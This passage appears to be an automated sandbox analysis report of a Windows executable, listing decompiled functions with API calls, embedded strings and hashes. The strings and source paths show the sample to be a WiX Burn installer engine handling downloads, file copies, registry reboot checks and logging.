                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00474EFB
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00474F0A
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00474F19
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to allocate ATOM unknown element name., xrefs: 00474DB3
                                                                                                                                                          • Failed get attributes on ATOM unknown element., xrefs: 00474E2D
                                                                                                                                                          • Failed to get unknown element value., xrefs: 00474DD7
                                                                                                                                                          • Failed to get unknown element name., xrefs: 00474D8E
                                                                                                                                                          • Failed to allocate ATOM unknown element namespace., xrefs: 00474D3C
                                                                                                                                                          • Failed to allocate ATOM unknown element value., xrefs: 00474DFF
                                                                                                                                                          • Failed to enumerate all attributes on ATOM unknown element., xrefs: 00474EB2
                                                                                                                                                          • Failed to allocate unknown element., xrefs: 00474CF1
                                                                                                                                                          • Failed to parse attribute on ATOM unknown element., xrefs: 00474EC6
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 00474CE0, 00474CEB, 00474D00, 00474D4B
                                                                                                                                                          • Failed to get unknown element namespace., xrefs: 00474D5D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeString$Heap$AllocProcess
                                                                                                                                                          • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM unknown element name.$Failed to allocate ATOM unknown element namespace.$Failed to allocate ATOM unknown element value.$Failed to allocate unknown element.$Failed to enumerate all attributes on ATOM unknown element.$Failed to get unknown element name.$Failed to get unknown element namespace.$Failed to get unknown element value.$Failed to parse attribute on ATOM unknown element.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                          • API String ID: 1440466813-2212259248
                                                                                                                                                          • Opcode ID: 9474b616f0d1c105437982d5d140579f43797b5451934d9943fed9d07d5ef24f
                                                                                                                                                          • Instruction ID: 9699fcafbd6da7079766b595e0108f5360dfc4e060ddffdfb6e3cc2d055a7cb8
                                                                                                                                                          • Opcode Fuzzy Hash: 9474b616f0d1c105437982d5d140579f43797b5451934d9943fed9d07d5ef24f
                                                                                                                                                          • Instruction Fuzzy Hash: AF81D331740615ABDB21CB54CC49FBE7769ABD1B18F10405AFA09BF2D0DBB89A01CB99
                                                                                                                                                          Function 0040FBB7 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 223processCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 0040FD7D
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0040FD87
                                                                                                                                                          • WaitForInputIdle.USER32(?,?), ref: 0040FDEB
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040FE34
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040FE46
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$CreateErrorIdleInputLastProcessWait
                                                                                                                                                          • String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$d:\a\wix\wix\src\burn\engine\approvedexe.cpp
                                                                                                                                                          • API String ID: 1086122317-3438387657
                                                                                                                                                          • Opcode ID: bce683bf1b6a12c899a81b44e5a9817ed7c59222f7e93627dd3f633445f79ce2
                                                                                                                                                          • Instruction ID: 5d8278ecadf702d2dc8b21c4abb2dcae60f6b46576193c6b46e2d465fbadc766
                                                                                                                                                          • Opcode Fuzzy Hash: bce683bf1b6a12c899a81b44e5a9817ed7c59222f7e93627dd3f633445f79ce2
                                                                                                                                                          • Instruction Fuzzy Hash: D571BD71E40219BBEB21AE91CD46FDEBB78EF04704F10407AFA04B65E1D3789A549B98
                                                                                                                                                          Function 004729AF Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 183fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00472A28
                                                                                                                                                            • Part of subcall function 00470ABB: RegCloseKey.ADVAPI32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 00470B65
                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 00472B65
                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 00472B74
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close$DeleteErrorFileHandleLast
                                                                                                                                                          • String ID: Burn$DownloadTimeout$Failed to copy download source URL.$Failed to download URL: %ls$Failed to open internet session$Ignoring failure to get size and time for URL: %ls (error 0x%x)$RgG$WiX\Burn$\gG$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp$zgG
                                                                                                                                                          • API String ID: 3163412224-4053184269
                                                                                                                                                          • Opcode ID: 64812b771fd23e892ae14f99fb75648c2fd6fe3af8af88ead69ea182c6035115
                                                                                                                                                          • Instruction ID: d29179a8cf859b2d4a7a6111097e064df2dc7409cb3583fac74b3fbbd4969c1d
                                                                                                                                                          • Opcode Fuzzy Hash: 64812b771fd23e892ae14f99fb75648c2fd6fe3af8af88ead69ea182c6035115
                                                                                                                                                          • Instruction Fuzzy Hash: E2515D72D40219BFDB219FA48D45FEF7B78EF04711F008166FA08F6191E7789A119BA8
                                                                                                                                                          Function 004733B5 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 169COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?), ref: 00473435
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0047355C
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to allocate ATOM author name., xrefs: 00473453
                                                                                                                                                          • Failed to get child nodes of ATOM author element., xrefs: 004733E6
                                                                                                                                                          • Failed to allocate ATOM author email., xrefs: 00473494
                                                                                                                                                          • email, xrefs: 00473469
                                                                                                                                                          • Failed to process all ATOM author elements., xrefs: 00473521
                                                                                                                                                          • Failed to allocate ATOM author uri., xrefs: 0047353F
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 004733F5, 00473530
                                                                                                                                                          • name, xrefs: 00473427
                                                                                                                                                          • uri, xrefs: 004734AA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$CompareFree
                                                                                                                                                          • String ID: Failed to allocate ATOM author email.$Failed to allocate ATOM author name.$Failed to allocate ATOM author uri.$Failed to get child nodes of ATOM author element.$Failed to process all ATOM author elements.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$email$name$uri
                                                                                                                                                          • API String ID: 3589242889-868808450
                                                                                                                                                          • Opcode ID: 0da66959b69b0b7a47b190c69e756c3c985ed3a4a9b25ae81097b2f76e026568
                                                                                                                                                          • Instruction ID: d1c6ceb3ec8629548df5a4805c4e5e153f63d1dae9502cbb3aae93c9a8f705f2
                                                                                                                                                          • Opcode Fuzzy Hash: 0da66959b69b0b7a47b190c69e756c3c985ed3a4a9b25ae81097b2f76e026568
                                                                                                                                                          • Instruction Fuzzy Hash: 4451F531A44205FBDF119F94CC49F9E3775AB50726F20819AF619BB2E0DB789B00EB58
                                                                                                                                                          Function 0044DB3C Relevance: 23.1, APIs: 2, Strings: 11, Instructions: 331COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000004,00000007,00000000,00000001,00000000,?), ref: 0044DCBD
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0044DCCB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorEventLast
                                                                                                                                                          • String ID: BA aborted cache.$Cache prepare package failed: %ls$Cancel during cache: %ls$Failed cache action: %ls$Failed to allocate cache search paths array.$Failed to ensure acquisition folder.$Failed to set syncpoint event.$cache package$d:\a\wix\wix\src\burn\engine\apply.cpp$layout bundle$layout container
                                                                                                                                                          • API String ID: 3848097054-4290225686
                                                                                                                                                          • Opcode ID: 38635bb5f02cb2c2ea94759cd9411876fe597ccee5a665a7dbc5355121e12b02
                                                                                                                                                          • Instruction ID: f8455ca099ae7d616808e7403c96ce71b716575fd57cb65740ae72f2345e81cb
                                                                                                                                                          • Opcode Fuzzy Hash: 38635bb5f02cb2c2ea94759cd9411876fe597ccee5a665a7dbc5355121e12b02
                                                                                                                                                          • Instruction Fuzzy Hash: DCB10171E40614BBEF219E55CC4AFAF7E64AF44B24F21412BF904BB2C1D6B89801CB98
                                                                                                                                                          Function 00404923 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 265fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00405811: GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,?,?,?,0040F92E,0100147D,?,?,00000000,00000000), ref: 00405829
                                                                                                                                                            • Part of subcall function 00405811: GetLastError.KERNEL32(?,?,?,0040F92E,0100147D,?,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 00405833
                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?), ref: 00404A57
                                                                                                                                                          • SetEndOfFile.KERNEL32(?), ref: 00404A63
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00404A6D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$ErrorLast$PointerSize
                                                                                                                                                          • String ID: Failed to get size of source.$Failed to read from source.$Failed to reset target file pointer.$Failed to set end of target file.$Failed to write to target.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 1903691966-3248098685
                                                                                                                                                          • Opcode ID: ec43ba1a0825121eceb761ba6f26ef7d30dfd88a777efe582723627243e86e1c
                                                                                                                                                          • Instruction ID: 34e2274c5cd205b5dbdbb822fe88d6eb8b20e6791624f411feb5617856b7e8f6
                                                                                                                                                          • Opcode Fuzzy Hash: ec43ba1a0825121eceb761ba6f26ef7d30dfd88a777efe582723627243e86e1c
                                                                                                                                                          • Instruction Fuzzy Hash: 5691CFB1A4012997DB319E148C44FEF7675EB88750F1140BAFA48B7290D6B8DEC09F98
                                                                                                                                                          Function 0042BBB7 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00470DEA: FindResourceExA.KERNEL32(00000000,0000000A,?,00000000), ref: 00470DFB
                                                                                                                                                            • Part of subcall function 00470DEA: GetLastError.KERNEL32(?,0042BBEB,004080B0,00000001,?,00000000,?,00000000,?,?,?,00000000,?,?,00000003,00000000), ref: 00470E07
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,004080B0,00000001,?,00000000,?,00000000,?,?,?,00000000,?,?,00000003), ref: 0042BD4D
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,?,?,00000000,?,?), ref: 0042BD62
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$ErrorFindLastResource
                                                                                                                                                          • String ID: Failed to create UI thread.$Failed to create modal event.$Failed to load splash screen configuration.$Failed to read splash screen configuration resource.$Invalid splash screen type: %i$d:\a\wix\wix\src\burn\engine\splashscreen.cpp
                                                                                                                                                          • API String ID: 3960716503-562085312
                                                                                                                                                          • Opcode ID: 4a6c28fe9f66eb1bd8a1d23df8c54b588a30ae6e37c87b59c45f25c0eec25732
                                                                                                                                                          • Instruction ID: 7dc44aecbd025529a602826fc3fa35b3c97832e5b8968647445c10648b93af37
                                                                                                                                                          • Opcode Fuzzy Hash: 4a6c28fe9f66eb1bd8a1d23df8c54b588a30ae6e37c87b59c45f25c0eec25732
                                                                                                                                                          • Instruction Fuzzy Hash: 0A412571A40215BBE711AF959C45FDF7BB9EB44710F50042BFA00B62D1E7B899408BA9
                                                                                                                                                          Function 004165B1 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 111registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00467AAE: RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,004165D9,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,00000214,00000000), ref: 00467B4B
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000120,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending,00000000,00000000,80000002,SOFTWARE\Microsoft\Updates,UpdateExeVolatile,00000000,00000214,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,00000214,00000000), ref: 004166CF
                                                                                                                                                          Strings
                                                                                                                                                          • PendingFileRenameOperations2, xrefs: 0041666D
                                                                                                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 0041668D
                                                                                                                                                          • CurrentRebootAttempts, xrefs: 004165C1
                                                                                                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update, xrefs: 00416640
                                                                                                                                                          • SOFTWARE\Microsoft\ServerManager, xrefs: 004165C6
                                                                                                                                                          • SOFTWARE\Microsoft\Updates, xrefs: 004165F0
                                                                                                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending, xrefs: 0041660A
                                                                                                                                                          • PendingFileRenameOperations, xrefs: 00416656
                                                                                                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 0041665B, 00416672
                                                                                                                                                          • AUState, xrefs: 0041663B
                                                                                                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootInProgress, xrefs: 00416621
                                                                                                                                                          • UpdateExeVolatile, xrefs: 004165EB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: AUState$CurrentRebootAttempts$PendingFileRenameOperations$PendingFileRenameOperations2$SOFTWARE\Microsoft\ServerManager$SOFTWARE\Microsoft\Updates$SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootInProgress$SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending$SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update$SYSTEM\CurrentControlSet\Control\Session Manager$SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations$UpdateExeVolatile
                                                                                                                                                          • API String ID: 3535843008-3032311648
                                                                                                                                                          • Opcode ID: 6208c273424f2a86ffd60d00c0fa8227034b7d02686f007b82c7ddb4781ce823
                                                                                                                                                          • Instruction ID: 40272b065c2383fe7cd34076f0aacd5b9a5873f36aaa9c95f916ec775eee68f9
                                                                                                                                                          • Opcode Fuzzy Hash: 6208c273424f2a86ffd60d00c0fa8227034b7d02686f007b82c7ddb4781ce823
                                                                                                                                                          • Instruction Fuzzy Hash: FA31EAB1E80755B78B31A6668C45DEFBA7CDA80B48B22055BF800B2112E67CDD45C77C
                                                                                                                                                          Function 0040B847 Relevance: 22.7, APIs: 2, Strings: 13, Instructions: 177COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,0040951C,00000000,0040959C,?,?,0040CFC4,00000002,?,7D89F88B,00000000), ref: 0040B856
                                                                                                                                                            • Part of subcall function 00409A72: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,?,0040AFB0,0040AFB0,?,004098C0,?,?,00000000), ref: 00409AAE
                                                                                                                                                            • Part of subcall function 00409A72: GetLastError.KERNEL32(?,004098C0,?,?,00000000,?,00000000,0040AFB0,?,0040CB94,?,?,?,?,?), ref: 00409ADD
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,?,?,00000000,7D89F88B,00000000), ref: 0040BA1D
                                                                                                                                                          Strings
                                                                                                                                                          • Unsetting variable '%ls', xrefs: 0040B9B2
                                                                                                                                                          • formatted, xrefs: 0040B993
                                                                                                                                                          • Setting version variable '%ls' to value '%ls', xrefs: 0040B962
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040B8ED, 0040BA0F
                                                                                                                                                          • string, xrefs: 0040B99A, 0040B9A2
                                                                                                                                                          • Setting %ls variable '%ls' to value '%ls', xrefs: 0040B9A3
                                                                                                                                                          • Failed to find variable value '%ls'., xrefs: 0040B871
                                                                                                                                                          • Setting hidden variable '%ls', xrefs: 0040B936
                                                                                                                                                          • Failed to insert variable '%ls'., xrefs: 0040B89E
                                                                                                                                                          • Failed to set value of variable: %ls, xrefs: 0040B9FD
                                                                                                                                                          • Setting numeric variable '%ls' to value %lld, xrefs: 0040B979
                                                                                                                                                          • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 0040BA2F
                                                                                                                                                          • Attempt to set built-in variable value: %ls, xrefs: 0040B8F8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                          • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting %ls variable '%ls' to value '%ls'$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%ls'$Unsetting variable '%ls'$d:\a\wix\wix\src\burn\engine\variable.cpp$formatted$string
                                                                                                                                                          • API String ID: 2716280545-4124691947
                                                                                                                                                          • Opcode ID: 5b68d3b1d3f380f7a6a1159d6f83e253df8e2de35c3ced3d6910c3d299951a66
                                                                                                                                                          • Instruction ID: d75be4dc490acd777b564a1eadb3e7de4efd0e02d22c893c3a3754f371a3e486
                                                                                                                                                          • Opcode Fuzzy Hash: 5b68d3b1d3f380f7a6a1159d6f83e253df8e2de35c3ced3d6910c3d299951a66
                                                                                                                                                          • Instruction Fuzzy Hash: 1F510471644250BBDB319E15CC4AF977A68DB81B04F20403BFA087A2D2D3BD9940CAEE
                                                                                                                                                          Function 00419A80 Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 361sleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • Sleep.KERNEL32(000007D0,00000008,?,00000000,?,?), ref: 00419BF3
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\logging.cpp, xrefs: 00419AFB, 00419B21, 00419C84
                                                                                                                                                          • log, xrefs: 00419BA3
                                                                                                                                                          • Failed to copy log file path from command line., xrefs: 00419AED
                                                                                                                                                          • Failed to get non-session specific TEMP folder., xrefs: 00419D4F
                                                                                                                                                          • Failed to copy log path to prefix., xrefs: 00419DAD
                                                                                                                                                          • Failed to copy full log path to prefix., xrefs: 00419E05
                                                                                                                                                          • Setup, xrefs: 00419B74
                                                                                                                                                          • Failed to copy log extension to extension., xrefs: 00419DDA
                                                                                                                                                          • Failed to initialize logging., xrefs: 00419B16
                                                                                                                                                          • Failed to copy default log extension., xrefs: 00419BB4
                                                                                                                                                          • Failed to get parent directory from '%ls'., xrefs: 00419CFA
                                                                                                                                                          • Failed to open log: %ls, xrefs: 00419C72
                                                                                                                                                          • Failed to copy default log prefix., xrefs: 00419B85
                                                                                                                                                          Memory Dump Source
